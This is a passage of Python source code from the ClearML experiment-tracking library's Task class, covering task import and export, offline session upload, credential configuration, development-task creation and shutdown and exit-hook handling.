func_params.pop(func_marker, None)
kwargs.update(func_params)
func(**kwargs)
# This is it, leave the process
leave_process(0)
def wait_for_status(
self,
status=(_Task.TaskStatusEnum.completed, _Task.TaskStatusEnum.stopped, _Task.TaskStatusEnum.closed),
raise_on_status=(_Task.TaskStatusEnum.failed,),
check_interval_sec=60.,
):
# type: (Iterable[Task.TaskStatusEnum], Optional[Iterable[Task.TaskStatusEnum]], float) -> ()
"""
Wait for a task to reach a defined status.
:param status: Status to wait for. Defaults to ('completed', 'stopped', 'closed', )
:param raise_on_status: Raise RuntimeError if the status of the tasks matches one of these values.
Defaults to ('failed').
:param check_interval_sec: Interval in seconds between two checks. Defaults to 60 seconds.
:raise: RuntimeError if the status is one of {raise_on_status}.
"""
stopped_status = list(status) + (list(raise_on_status) if raise_on_status else [])
while self.status not in stopped_status:
time.sleep(check_interval_sec)
if raise_on_status and self.status in raise_on_status:
raise RuntimeError("Task {} has status: {}.".format(self.task_id, self.status))
# make sure we have the Task object
self.reload()
def export_task(self):
# type: () -> dict
"""
Export Task's configuration into a dictionary (for serialization purposes).
A Task can be copied/modified by calling Task.import_task()
Notice: Export task does not include the tasks outputs, such as results
(scalar/plots etc.) or Task artifacts/models
:return: dictionary of the Task's configuration.
"""
self.reload()
export_data = self.data.to_dict()
export_data.pop('last_metrics', None)
export_data.pop('last_iteration', None)
export_data.pop('status_changed', None)
export_data.pop('status_reason', None)
export_data.pop('status_message', None)
export_data.get('execution', {}).pop('artifacts', None)
export_data.get('execution', {}).pop('model', None)
export_data['project_name'] = self.get_project_name()
export_data['session_api_version'] = self.session.api_version
return export_data
def update_task(self, task_data):
# type: (dict) -> bool
"""
Update current task with configuration found on the task_data dictionary.
See also export_task() for retrieving Task configuration.
:param task_data: dictionary with full Task configuration
:return: return True if Task update was successful
"""
return bool(self.import_task(task_data=task_data, target_task=self, update=True))
@classmethod
def import_task(cls, task_data, target_task=None, update=False):
# type: (dict, Optional[Union[str, Task]], bool) -> Optional[Task]
"""
Import (create) Task from previously exported Task configuration (see Task.export_task)
Can also be used to edit/update an existing Task (by passing `target_task` and `update=True`).
:param task_data: dictionary of a Task's configuration
:param target_task: Import task_data into an existing Task. Can be either task_id (str) or Task object.
:param update: If True, merge task_data with current Task configuration.
:return: return True if Task was imported/updated
"""
# restore original API version (otherwise, we might not be able to restore the data correctly)
force_api_version = task_data.get('session_api_version') or None
original_api_version = Session.api_version
original_force_max_api_version = Session.force_max_api_version
if force_api_version:
Session.force_max_api_version = str(force_api_version)
if not target_task:
project_name = task_data.get('project_name') or Task._get_project_name(task_data.get('project', ''))
target_task = Task.create(project_name=project_name, task_name=task_data.get('name', None))
elif isinstance(target_task, six.string_types):
target_task = Task.get_task(task_id=target_task)
elif not isinstance(target_task, Task):
raise ValueError(
"`target_task` must be either Task id (str) or Task object, "
"received `target_task` type {}".format(type(target_task)))
target_task.reload()
cur_data = target_task.data.to_dict()
cur_data = merge_dicts(cur_data, task_data) if update else dict(**task_data)
cur_data.pop('id', None)
cur_data.pop('project', None)
# noinspection PyProtectedMember
valid_fields = list(tasks.EditRequest._get_data_props().keys())
cur_data = dict((k, cur_data[k]) for k in valid_fields if k in cur_data)
res = target_task._edit(**cur_data)
if res and res.ok():
target_task.reload()
else:
target_task = None
# restore current api version, and return a new instance if Task with the current version
if force_api_version:
Session.force_max_api_version = original_force_max_api_version
Session.api_version = original_api_version
if target_task:
target_task = Task.get_task(task_id=target_task.id)
return target_task
@classmethod
def import_offline_session(cls, session_folder_zip):
# type: (str) -> (Optional[str])
"""
Upload an off line session (execution) of a Task.
Full Task execution includes repository details, installed packages, artifacts, logs, metric and debug samples.
:param session_folder_zip: Path to a folder containing the session, or zip-file of the session folder.
:return: Newly created task ID (str)
"""
print('ClearML: Importing offline session from {}'.format(session_folder_zip))
temp_folder = None
if Path(session_folder_zip).is_file():
# unzip the file:
temp_folder = mkdtemp(prefix='clearml-offline-')
ZipFile(session_folder_zip).extractall(path=temp_folder)
session_folder_zip = temp_folder
session_folder = Path(session_folder_zip)
if not session_folder.is_dir():
raise ValueError("Could not find the session folder / zip-file {}".format(session_folder))
try:
with open((session_folder / cls._offline_filename).as_posix(), 'rt') as f:
export_data = json.load(f)
except Exception as ex:
raise ValueError(
"Could not read Task object {}: Exception {}".format(session_folder / cls._offline_filename, ex))
task = cls.import_task(export_data)
task.mark_started(force=True)
# fix artifacts
if task.data.execution.artifacts:
from . import StorageManager
# noinspection PyProtectedMember
offline_folder = os.path.join(export_data.get('offline_folder', ''), 'data/')
# noinspection PyProtectedMember
remote_url = task._get_default_report_storage_uri()
if remote_url and remote_url.endswith('/'):
remote_url = remote_url[:-1]
for artifact in task.data.execution.artifacts:
local_path = artifact.uri.replace(offline_folder, '', 1)
local_file = session_folder / 'data' / local_path
if local_file.is_file():
remote_path = local_path.replace(
'.{}{}'.format(export_data['id'], os.sep), '.{}{}'.format(task.id, os.sep), 1)
artifact.uri = '{}/{}'.format(remote_url, remote_path)
StorageManager.upload_file(local_file=local_file.as_posix(), remote_url=artifact.uri)
# noinspection PyProtectedMember
task._edit(execution=task.data.execution)
# logs
TaskHandler.report_offline_session(task, session_folder)
# metrics
Metrics.report_offline_session(task, session_folder)
# print imported results page
print('ClearML results page: {}'.format(task.get_output_log_web_page()))
task.mark_completed()
# close task
task.close()
# cleanup
if temp_folder:
# noinspection PyBroadException
try:
shutil.rmtree(temp_folder)
except Exception:
pass
return task.id
@classmethod
def set_credentials(
cls,
api_host=None,
web_host=None,
files_host=None,
key=None,
secret=None,
store_conf_file=False
):
# type: (Optional[str], Optional[str], Optional[str], Optional[str], Optional[str], bool) -> None
"""
Set new default **ClearML Server** (backend) host and credentials.
These credentials will be overridden by either OS environment variables, or the ClearML configuration
file, ``clearml.conf``.
.. warning::
Credentials must be set before initializing a Task object.
For example, to set credentials for a remote computer:
.. code-block:: py
Task.set_credentials(
api_host='http://localhost:8008', web_host='http://localhost:8080', files_host='http://localhost:8081',
key='optional_credentials', secret='optional_credentials'
)
task = Task.init('project name', 'experiment name')
:param str api_host: The API server url. For example, ``host='http://localhost:8008'``
:param str web_host: The Web server url. For example, ``host='http://localhost:8080'``
:param str files_host: The file server url. For example, ``host='http://localhost:8081'``
:param str key: The user key (in the key/secret pair). For example, ``key='thisisakey123'``
:param str secret: The user secret (in the key/secret pair). For example, ``secret='thisisseceret123'``
:param bool store_conf_file: If True store the current configuration into the ~/clearml.conf file.
If the configuration file exists, no change will be made (outputs a warning).
Not applicable when running remotely (i.e. clearml-agent).
"""
if api_host:
Session.default_host = api_host
if not running_remotely() and not ENV_HOST.get():
ENV_HOST.set(api_host)
if web_host:
Session.default_web = web_host
if not running_remotely() and not ENV_WEB_HOST.get():
ENV_WEB_HOST.set(web_host)
if files_host:
Session.default_files = files_host
if not running_remotely() and not ENV_FILES_HOST.get():
ENV_FILES_HOST.set(files_host)
if key:
Session.default_key = key
if not running_remotely():
ENV_ACCESS_KEY.set(key)
if secret:
Session.default_secret = secret
if not running_remotely():
ENV_SECRET_KEY.set(secret)
if store_conf_file and not running_remotely():
active_conf_file = get_active_config_file()
if active_conf_file:
getLogger().warning(
'Could not store credentials in configuration file, '
'\'{}\' already exists'.format(active_conf_file))
else:
conf = {'api': dict(
api_server=Session.default_host,
web_server=Session.default_web,
files_server=Session.default_files,
credentials=dict(access_key=Session.default_key, secret_key=Session.default_secret))}
with open(get_config_file(), 'wt') as f:
lines = json.dumps(conf, indent=4).split('\n')
f.write('\n'.join(lines[1:-1]))
@classmethod
def debug_simulate_remote_task(cls, task_id, reset_task=False):
# type: (str, bool) -> ()
"""
Simulate remote execution of a specified Task.
This call will simulate the behaviour of your Task as if executed by the ClearML-Agent
This means configurations will be coming from the backend server into the code
(the opposite from manual execution, where the backend logs the code arguments)
Use with care.
:param task_id: Task ID to simulate, notice that all configuration will be taken from the specified
Task, regardless of the code initial values, just like it as if executed by ClearML agent
:param reset_task: If True target Task, is automatically cleared / reset.
"""
# if we are already running remotely, do nothing
if running_remotely():
return
# verify Task ID exists
task = Task.get_task(task_id=task_id)
if not task:
raise ValueError("Task ID '{}' could not be found".format(task_id))
if reset_task:
task.reset(set_started_on_success=False, force=True)
from .config.remote import override_current_task_id
from .config.defs import LOG_TO_BACKEND_ENV_VAR
override_current_task_id(task_id)
LOG_TO_BACKEND_ENV_VAR.set(True)
DEBUG_SIMULATE_REMOTE_TASK.set(True)
@classmethod
def _create(cls, project_name=None, task_name=None, task_type=TaskTypes.training):
# type: (Optional[str], Optional[str], Task.TaskTypes) -> Task
"""
Create a new unpopulated Task (experiment).
:param str project_name: The name of the project in which the experiment will be created.
If ``project_name`` is ``None``, and the main execution Task is initialized (see :meth:`Task.init`),
then the main execution Task's project is used. Otherwise, if the project does
not exist, it is created. (Optional)
:param str task_name: The name of Task (experiment).
:param TaskTypes task_type: The task type.
:return: The newly created task created.
"""
if not project_name:
if not cls.__main_task:
raise ValueError("Please provide project_name, no global task context found "
"(Task.current_task hasn't been called)")
project_name = cls.__main_task.get_project_name()
try:
task = cls(
private=cls.__create_protection,
project_name=project_name,
task_name=task_name,
task_type=task_type,
log_to_backend=False,
force_create=True,
)
except Exception:
raise
return task
def _set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
Set Task model configuration text/dict
:param config_text: model configuration (unconstrained text string). usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# noinspection PyProtectedMember
design = OutputModel._resolve_config(config_text=config_text, config_dict=config_dict)
super(Task, self)._set_model_design(design=design)
def _get_model_config_text(self):
# type: () -> str
"""
Get Task model configuration text (before creating an output model)
When an output model is created it will inherit these properties
:return: The model config_text (unconstrained text string).
"""
return super(Task, self).get_model_design()
def _get_model_config_dict(self):
# type: () -> Dict
"""
Get Task model configuration dictionary (before creating an output model)
When an output model is created it will inherit these properties
:return: config_dict: model configuration parameters dictionary.
"""
config_text = self._get_model_config_text()
# noinspection PyProtectedMember
return OutputModel._text_to_config_dict(config_text)
@classmethod
def _reset_current_task_obj(cls):
if not cls.__main_task:
return
task = cls.__main_task
cls.__main_task = None
if task._dev_worker:
task._dev_worker.unregister()
task._dev_worker = None
@classmethod
def _has_current_task_obj(cls):
# type: () -> bool
return bool(cls.__main_task)
@classmethod
def _create_dev_task(
cls, default_project_name, default_task_name, default_task_type, tags,
reuse_last_task_id, continue_last_task=False, detect_repo=True, auto_connect_streams=True
):
if not default_project_name or not default_task_name:
# get project name and task name from repository name and entry_point
result, _ = ScriptInfo.get(create_requirements=False, check_uncommitted=False)
if not default_project_name:
# noinspection PyBroadException
try:
parts = result.script['repository'].split('/')
default_project_name = (parts[-1] or parts[-2]).replace('.git', '') or 'Untitled'
except Exception:
default_project_name = 'Untitled'
if not default_task_name:
# noinspection PyBroadException
try:
default_task_name = os.path.splitext(os.path.basename(result.script['entry_point']))[0]
except Exception:
pass
# conform reuse_last_task_id and continue_last_task
if continue_last_task and isinstance(continue_last_task, str):
reuse_last_task_id = continue_last_task
continue_last_task = True
elif isinstance(continue_last_task, int) and continue_last_task is not True:
# allow initial offset environment override
continue_last_task = continue_last_task
if TASK_SET_ITERATION_OFFSET.get() is not None:
continue_last_task = TASK_SET_ITERATION_OFFSET.get()
# if we force no task reuse from os environment
if DEV_TASK_NO_REUSE.get() or not reuse_last_task_id or isinstance(reuse_last_task_id, str):
default_task = None
else:
# if we have a previous session to use, get the task id from it
default_task = cls.__get_last_used_task_id(
default_project_name,
default_task_name,
default_task_type.value,
)
closed_old_task = False
default_task_id = None
task = None
in_dev_mode = not running_remotely()
if in_dev_mode:
if isinstance(reuse_last_task_id, str) and reuse_last_task_id:
default_task_id = reuse_last_task_id
elif not reuse_last_task_id or not cls.__task_is_relevant(default_task):
default_task_id = None
else:
default_task_id = default_task.get('id') if default_task else None
if default_task_id:
try:
task = cls(
private=cls.__create_protection,
task_id=default_task_id,
log_to_backend=True,
)
# instead of resting the previously used task we are continuing the training with it.
if task and \
(continue_last_task or
(isinstance(continue_last_task, int) and not isinstance(continue_last_task, bool))):
task.reload()
task.mark_started(force=True)
# allow to disable the
if continue_last_task is True:
task.set_initial_iteration(task.get_last_iteration() + 1)
else:
task.set_initial_iteration(continue_last_task)
else:
task_tags = task.data.system_tags if hasattr(task.data, 'system_tags') else task.data.tags
task_artifacts = task.data.execution.artifacts \
if hasattr(task.data.execution, 'artifacts') else None
if ((str(task._status) in (
str(tasks.TaskStatusEnum.published), str(tasks.TaskStatusEnum.closed)))
or task.output_models_id or (cls.archived_tag in task_tags)
or (cls._development_tag not in task_tags)
or task_artifacts):
# If the task is published or closed, we shouldn't reset it so we can't use it in dev mode
# If the task is archived, or already has an output model,
# we shouldn't use it in development mode either
default_task_id = None
task = None
else:
with task._edit_lock:
# from now on, there is no need to reload, we just clear stuff,
# this flag will be cleared off once we actually refresh at the end of the function
task._reload_skip_flag = True
# reset the task, so we can update it
task.reset(set_started_on_success=False, force=False)
# clear the heaviest stuff first
task._clear_task(
system_tags=[cls._development_tag],
comment=make_message('Auto-generated at %(time)s by %(user)s@%(host)s'))
except (Exception, ValueError):
# we failed reusing task, create a new one
default_task_id = None
# create a new task
if not default_task_id:
task = cls(
private=cls.__create_protection,
project_name=default_project_name,
task_name=default_task_name,
task_type=default_task_type,
log_to_backend=True,
)
# no need to reload yet, we clear this before the end of the function
task._reload_skip_flag = True
if in_dev_mode:
# update this session, for later use
cls.__update_last_used_task_id(default_project_name, default_task_name, default_task_type.value, task.id)
# set default docker image from env.
task._set_default_docker_image()
# mark us as the main Task, there should only be one dev Task at a time.
if not Task.__main_task:
Task.__main_task = task
# mark the task as started
task.started()
# reload, making sure we are synced
task._reload_skip_flag = False
task.reload()
# add Task tags
if tags:
task.add_tags([tags] if isinstance(tags, str) else tags)
# force update of base logger to this current task (this is the main logger task)
logger = task._get_logger(auto_connect_streams=auto_connect_streams)
if closed_old_task:
logger.report_text('ClearML Task: Closing old development task id={}'.format(default_task.get('id')))
# print warning, reusing/creating a task
if default_task_id and not continue_last_task:
logger.report_text('ClearML Task: overwriting (reusing) task id=%s' % task.id)
elif default_task_id and continue_last_task:
logger.report_text('ClearML Task: continuing previous task id=%s '
'Notice this run will not be reproducible!' % task.id)
else:
logger.report_text('ClearML Task: created new task id=%s' % task.id)
# update current repository and put warning into logs
if detect_repo:
# noinspection PyBroadException
try:
import traceback
stack = traceback.extract_stack(limit=10)
# NOTICE WE ARE ALWAYS 3 down from caller in stack!
for i in range(len(stack) - 1, 0, -1):
# look for the Task.init call, then the one above it is the callee module
if stack[i].name == 'init':
task._calling_filename = os.path.abspath(stack[i - 1].filename)
break
except Exception:
pass
if in_dev_mode and cls.__detect_repo_async:
task._detect_repo_async_thread = threading.Thread(target=task._update_repository)
task._detect_repo_async_thread.daemon = True
task._detect_repo_async_thread.start()
else:
task._update_repository()
# make sure we see something in the UI
thread = threading.Thread(target=LoggerRoot.flush)
thread.daemon = True
thread.start()
return task
def _get_logger(self, flush_period=NotSet, auto_connect_streams=False):
# type: (Optional[float], Union[bool, dict]) -> Logger
"""
get a logger object for reporting based on the task
:param flush_period: The period of the logger flush.
If None of any other False value, will not flush periodically.
If a logger was created before, this will be the new period and
the old one will be discarded.
:return: Logger object
"""
if not self._logger:
# do not recreate logger after task was closed/quit
if self._at_exit_called and self._at_exit_called in (True, get_current_thread_id(),):
raise ValueError("Cannot use Task Logger after task was closed")
# Get a logger object
self._logger = Logger(
private_task=self,
connect_stdout=(auto_connect_streams is True) or
(isinstance(auto_connect_streams, dict) and auto_connect_streams.get('stdout', False)),
connect_stderr=(auto_connect_streams is True) or
(isinstance(auto_connect_streams, dict) and auto_connect_streams.get('stderr', False)),
connect_logging=isinstance(auto_connect_streams, dict) and auto_connect_streams.get('logging', False),
)
# make sure we set our reported to async mode
# we make sure we flush it in self._at_exit
self._reporter.async_enable = True
# if we just created the logger, set default flush period
if not flush_period or flush_period is self.NotSet:
flush_period = DevWorker.report_period
if isinstance(flush_period, (int, float)):
flush_period = int(abs(flush_period))
if flush_period is None or isinstance(flush_period, int):
self._logger.set_flush_period(flush_period)
return self._logger
def _connect_output_model(self, model, name=None):
assert isinstance(model, OutputModel)
model.connect(self, name=name)
return model
def _save_output_model(self, model):
"""
Deprecated: Save a reference to the connected output model.
:param model: The connected output model
"""
# deprecated
self._connected_output_model = model
def _reconnect_output_model(self):
"""
Deprecated: If there is a saved connected output model, connect it again.
This is needed if the input model is connected after the output model
is connected, an then we will have to get the model design from the
input model by reconnecting.
"""
# Deprecated:
if self._connected_output_model:
self.connect(self._connected_output_model)
def _connect_input_model(self, model, name=None):
assert isinstance(model, InputModel)
# we only allow for an input model to be connected once
# at least until we support multiple input models
# notice that we do not check the task's input model because we allow task reuse and overwrite
# add into comment that we are using this model
comment = self.comment or ''
if not comment.endswith('\n'):
comment += '\n'
comment += 'Using model id: {}'.format(model.id)
self.set_comment(comment)
model.connect(self, name)
return model
def _connect_argparse(self, parser, args=None, namespace=None, parsed_args=None, name=None):
# do not allow argparser to connect to jupyter notebook
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython # noqa
ip = get_ipython()
if ip is not None and 'IPKernelApp' in ip.config:
return parser
except Exception:
pass
if self.is_main_task():
argparser_update_currenttask(self)
if (parser is None or parsed_args is None) and argparser_parseargs_called():
# if we have a parser but nor parsed_args, we need to find the parser
if parser and not parsed_args:
for _parser, _parsed_args in get_argparser_last_args():
if _parser == parser:
parsed_args = _parsed_args
break
else:
# prefer the first argparser (hopefully it is more relevant?!
for _parser, _parsed_args in get_argparser_last_args():
if parser is None:
parser = _parser
if parsed_args is None and parser == _parser:
parsed_args = _parsed_args
if running_remotely() and (self.is_main_task() or self._is_remote_main_task()):
self._arguments.copy_to_parser(parser, parsed_args)
else:
self._arguments.copy_defaults_from_argparse(
parser, args=args, namespace=namespace, parsed_args=parsed_args)
return parser
def _connect_dictionary(self, dictionary, name=None):
def _update_args_dict(task, config_dict):
# noinspection PyProtectedMember
task._arguments.copy_from_dict(flatten_dictionary(config_dict), prefix=name)
def _refresh_args_dict(task, config_dict):
# reread from task including newly added keys
# noinspection PyProtectedMember
a_flat_dict = task._arguments.copy_to_dict(flatten_dictionary(config_dict), prefix=name)
# noinspection PyProtectedMember
nested_dict = config_dict._to_dict()
config_dict.clear()
config_dict.update(nested_from_flat_dictionary(nested_dict, a_flat_dict))
if not running_remotely() or not (self.is_main_task() or self._is_remote_main_task()):
self._arguments.copy_from_dict(flatten_dictionary(dictionary), prefix=name)
dictionary = ProxyDictPostWrite(self, _update_args_dict, **dictionary)
else:
flat_dict = flatten_dictionary(dictionary)
flat_dict = self._arguments.copy_to_dict(flat_dict, prefix=name)
dictionary = nested_from_flat_dictionary(dictionary, flat_dict)
dictionary = ProxyDictPostWrite(self, _refresh_args_dict, **dictionary)
return dictionary
def _connect_task_parameters(self, attr_class, name=None):
if running_remotely() and (self.is_main_task() or self._is_remote_main_task()):
parameters = self.get_parameters()
if not name:
attr_class.update_from_dict(parameters)
else:
attr_class.update_from_dict(
dict((k[len(name) + 1:], v) for k, v in parameters.items() if k.startswith('{}/'.format(name))))
else:
self.set_parameters(attr_class.to_dict(), __parameters_prefix=name)
return attr_class
def _connect_object(self, an_object, name=None):
def verify_type(key, value):
if str(key).startswith('_') or not isinstance(value, self._parameters_allowed_types):
return False
# verify everything is json able (i.e. basic types)
try:
json.dumps(value)
return True
except TypeError:
return False
a_dict = {k: v for k, v in an_object.__dict__.items() if verify_type(k, v)}
if running_remotely() and (self.is_main_task() or self._is_remote_main_task()):
a_dict = self._connect_dictionary(a_dict, name)
for k, v in a_dict.items():
if getattr(an_object, k, None) != a_dict[k]:
setattr(an_object, k, v)
return an_object
else:
self._connect_dictionary(a_dict, name)
return an_object
def _dev_mode_stop_task(self, stop_reason, pid=None):
# make sure we do not get called (by a daemon thread) after at_exit
if self._at_exit_called:
return
self.log.warning(
"### TASK STOPPED - USER ABORTED - {} ###".format(
stop_reason.upper().replace('_', ' ')
)
)
self.flush(wait_for_uploads=True)
self.stopped(status_reason='USER ABORTED')
if self._dev_worker:
self._dev_worker.unregister()
# NOTICE! This will end the entire execution tree!
if self.__exit_hook:
self.__exit_hook.remote_user_aborted = True
self._kill_all_child_processes(send_kill=False, pid=pid, allow_kill_calling_pid=False)
time.sleep(2.0)
self._kill_all_child_processes(send_kill=True, pid=pid, allow_kill_calling_pid=True)
os._exit(1) # noqa
@staticmethod
def _kill_all_child_processes(send_kill=False, pid=None, allow_kill_calling_pid=True):
# get current process if pid not provided
current_pid = os.getpid()
kill_ourselves = None
pid = pid or current_pid
try:
parent = psutil.Process(pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
# kill ourselves last (if we need to)
if child.pid == current_pid:
kill_ourselves = child
continue
if send_kill:
child.kill()
else:
child.terminate()
# parent ourselves
if allow_kill_calling_pid or parent.pid != current_pid:
if send_kill:
parent.kill()
else:
parent.terminate()
# kill ourselves if we need to:
if allow_kill_calling_pid and kill_ourselves:
if send_kill:
kill_ourselves.kill()
else:
kill_ourselves.terminate()
def _dev_mode_setup_worker(self):
if (running_remotely() and not DEBUG_SIMULATE_REMOTE_TASK.get()) \
or not self.is_main_task() or self._at_exit_called or self._offline_mode:
return
if self._dev_worker:
return self._dev_worker
self._dev_worker = DevWorker()
self._dev_worker.register(self)
logger = self.get_logger()
flush_period = logger.get_flush_period()
if not flush_period or flush_period > self._dev_worker.report_period:
logger.set_flush_period(self._dev_worker.report_period)
def _wait_for_repo_detection(self, timeout=None):
# wait for detection repo sync
if not self._detect_repo_async_thread:
return
with self._repo_detect_lock:
if not self._detect_repo_async_thread:
return
# noinspection PyBroadException
try:
if self._detect_repo_async_thread.is_alive():
# if negative timeout, just kill the thread:
if timeout is not None and timeout < 0:
from .utilities.lowlevel.threads import kill_thread
kill_thread(self._detect_repo_async_thread)
else:
self.log.info('Waiting for repository detection and full package requirement analysis')
self._detect_repo_async_thread.join(timeout=timeout)
# because join has no return value
if self._detect_repo_async_thread.is_alive():
self.log.info('Repository and package analysis timed out ({} sec), '
'giving up'.format(timeout))
# done waiting, kill the thread
from .utilities.lowlevel.threads import kill_thread
kill_thread(self._detect_repo_async_thread)
else:
self.log.info('Finished repository detection and package analysis')
self._detect_repo_async_thread = None
except Exception:
pass
def _summary_artifacts(self):
# signal artifacts upload, and stop daemon
self._artifacts_manager.stop(wait=True)
# print artifacts summary (if not empty)
if self._artifacts_manager.summary:
self.get_logger().report_text(self._artifacts_manager.summary)
def _at_exit(self):
# protect sub-process at_exit (should never happen)
if self._at_exit_called and self._at_exit_called != get_current_thread_id():
return
# make sure we do not try to use events, because Python might deadlock itself.
# https://bugs.python.org/issue41606
if self.__is_subprocess():
BackgroundMonitor.set_at_exit_state(True)
# shutdown will clear the main, so we have to store it before.
# is_main = self.is_main_task()
# fix debugger signal in the middle, catch everything
try:
self.__shutdown()
except: # noqa
pass
# In rare cases we might need to forcefully shutdown the process, currently we should avoid it.
# if is_main:
# # we have to forcefully shutdown if we have forked processes, sometimes they will get stuck
# os._exit(self.__exit_hook.exit_code if self.__exit_hook and self.__exit_hook.exit_code else 0)
def __shutdown(self):
"""
Will happen automatically once we exit code, i.e. atexit
:return:
"""
# protect sub-process at_exit
if self._at_exit_called:
is_sub_process = self.__is_subprocess()
# if we are called twice (signal in the middle of the shutdown),
_nested_shutdown_call = bool(self._at_exit_called == get_current_thread_id())
if _nested_shutdown_call and not is_sub_process:
# if we were called again in the main thread on the main process, let's try again
# make sure we only do this once
self._at_exit_called = True
else:
# make sure we flush stdout, this is the best we can do.
if _nested_shutdown_call and self._logger and is_sub_process:
# noinspection PyProtectedMember
self._logger._close_stdout_handler(wait=True)
self._at_exit_called = True
# if we get here, we should do nothing and leave
return
else:
# from here only a single thread can re-enter
self._at_exit_called = get_current_thread_id()
# disable lock on signal callbacks, to avoid deadlocks.
if self.__exit_hook and self.__exit_hook.signal is not None:
self.__edit_lock = False
is_sub_process = self.__is_subprocess()
# noinspection PyBroadException
try:
wait_for_uploads = True
# first thing mark task as stopped, so we will not end up with "running" on lost tasks
# if we are running remotely, the daemon will take care of it
task_status = None
wait_for_std_log = True
if (not running_remotely() or DEBUG_SIMULATE_REMOTE_TASK.get()) \
and self.is_main_task() and not is_sub_process:
# check if we crashed, ot the signal is not interrupt (manual break)
task_status = ('stopped',)
if self.__exit_hook:
is_exception = self.__exit_hook.exception
# check if we are running inside a debugger
if not is_exception and sys.modules.get('pydevd'):
# noinspection PyBroadException
try:
is_exception = sys.last_type
except Exception:
pass
# check if this is Jupyter interactive session, do not mark as exception
if 'IPython' in sys.modules:
is_exception = None
# only if we have an exception (and not ctrl-break) or signal is not SIGTERM / SIGINT
if (is_exception and not isinstance(is_exception, KeyboardInterrupt)
and is_exception != KeyboardInterrupt) \
or (not self.__exit_hook.remote_user_aborted and
self.__exit_hook.signal not in (None, 2, 15)):
task_status = (
'failed',
'Exception {}'.format(is_exception) if is_exception else
'Signal {}'.format(self.__exit_hook.signal))
wait_for_uploads = False
else:
wait_for_uploads = (self.__exit_hook.remote_user_aborted or self.__exit_hook.signal is None)
if not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal is None and \
not is_exception:
task_status = ('completed',)
else:
task_status = ('stopped',)
# user aborted. do not bother flushing the stdout logs
wait_for_std_log = self.__exit_hook.signal is not None
# wait for repository detection (if we didn't crash)
if wait_for_uploads and self._logger:
# we should print summary here
self._summary_artifacts()
# make sure that if we crashed the thread we are not waiting forever
if not is_sub_process:
self._wait_for_repo_detection(timeout=10.)
# kill the repo thread (negative timeout, do not wait), if it hasn't finished yet.
if not is_sub_process:
self._wait_for_repo_detection(timeout=-1)
# wait for uploads
print_done_waiting = False
if wait_for_uploads and (BackendModel.get_num_results() > 0 or
(self.__reporter and self.__reporter.events_waiting())):
self.log.info('Waiting to finish uploads')
print_done_waiting = True
# from here, do not send log in background thread
if wait_for_uploads:
self.flush(wait_for_uploads=True)
# wait until the reporter flush everything
if self.__reporter:
self.__reporter.stop()
if self.is_main_task():
# notice: this will close the reporting for all the Tasks in the system
Metrics.close_async_threads()
# notice: this will close the jupyter monitoring
ScriptInfo.close()
if self.is_main_task():
# noinspection PyBroadException
try:
from .storage.helper import StorageHelper
StorageHelper.close_async_threads()
except Exception:
pass
if print_done_waiting:
self.log.info('Finished uploading')
# elif self._logger:
# # noinspection PyProtectedMember
# self._logger._flush_stdout_handler()
# from here, do not check worker status
if self._dev_worker:
self._dev_worker.unregister()
self._dev_worker = None
# stop resource monitoring
if self._resource_monitor:
self._resource_monitor.stop()
self._resource_monitor = None
if self._logger:
self._logger.set_flush_period(None)
# noinspection PyProtectedMember
self._logger._close_stdout_handler(wait=wait_for_uploads or wait_for_std_log)
if not is_sub_process:
# change task status
if not task_status:
pass
elif task_status[0] == 'failed':
self.mark_failed(status_reason=task_status[1])
elif task_status[0] == 'completed':
self.mark_completed()
elif task_status[0] == 'stopped':
self.stopped()
# this is so in theory we can close a main task and start a new one
if self.is_main_task():
Task.__main_task = None
Task.__update_master_pid_task(task=None)
except Exception:
# make sure we do not interrupt the exit process
pass
# make sure we store last task state
if self._offline_mode and not is_sub_process:
# noinspection PyBroadException
try:
# create zip file
offline_folder = self.get_offline_mode_folder()
zip_file = offline_folder.as_posix() + '.zip'
with ZipFile(zip_file, 'w', allowZip64=True, compression=ZIP_DEFLATED) as zf:
for filename in offline_folder.rglob('*'):
if filename.is_file():
relative_file_name = filename.relative_to(offline_folder).as_posix()
zf.write(filename.as_posix(), arcname=relative_file_name)
print('ClearML Task: Offline session stored in {}'.format(zip_file))
except Exception:
pass
# delete locking object (lock file)
if self._edit_lock:
# noinspection PyBroadException
try:
del self.__edit_lock
except Exception:
pass
self._edit_lock = None
# make sure no one will re-enter the shutdown method
self._at_exit_called = True
if not is_sub_process and BackgroundMonitor.is_subprocess_enabled():
BackgroundMonitor.wait_for_sub_process(self)
@classmethod
def __register_at_exit(cls, exit_callback, only_remove_signal_and_exception_hooks=False):
class ExitHooks(object):
_orig_exit = None
_orig_exc_handler = None
remote_user_aborted = False
def __init__(self, callback):
self.exit_code = None
self.exception = None
self.signal = None
self._exit_callback = callback
self._org_handlers = {}
self._signal_recursion_protection_flag = False
self._except_recursion_protection_flag = False
def update_callback(self, callback):
if self._exit_callback and not six.PY2:
# noinspection PyBroadException
try:
atexit.unregister(self._exit_callback)
except Exception:
pass
self._exit_callback = callback
if callback:
self.hook()
else:
# un register int hook
if self._orig_exc_handler:
sys.excepthook = self._orig_exc_handler
self._orig_exc_handler = None
for h in self._org_handlers:
# noinspection PyBroadException
try:
signal.signal(h, self._org_handlers[h])
except Exception:
pass
self._org_handlers = {}
def hook(self):
if self._orig_exit is None:
self._orig_exit = sys.exit
sys.exit = self.exit
if self._orig_exc_handler is None:
self._orig_exc_handler = sys.excepthook
sys.excepthook = self.exc_handler
if self._exit_callback:
atexit.register(self._exit_callback)
# TODO: check if sub-process hooks are safe enough, for the time being allow it
if not self._org_handlers: # ## and not Task._Task__is_subprocess():
if sys.platform == 'win32':
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE]
else:
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE, signal.SIGQUIT]
for c in catch_signals:
# noinspection PyBroadException
try:
self._org_handlers[c] = signal.getsignal(c)
signal.signal(c, self.signal_handler)
except Exception:
pass
def exit(self, code=0):
self.exit_code = code
self._orig_exit(code)
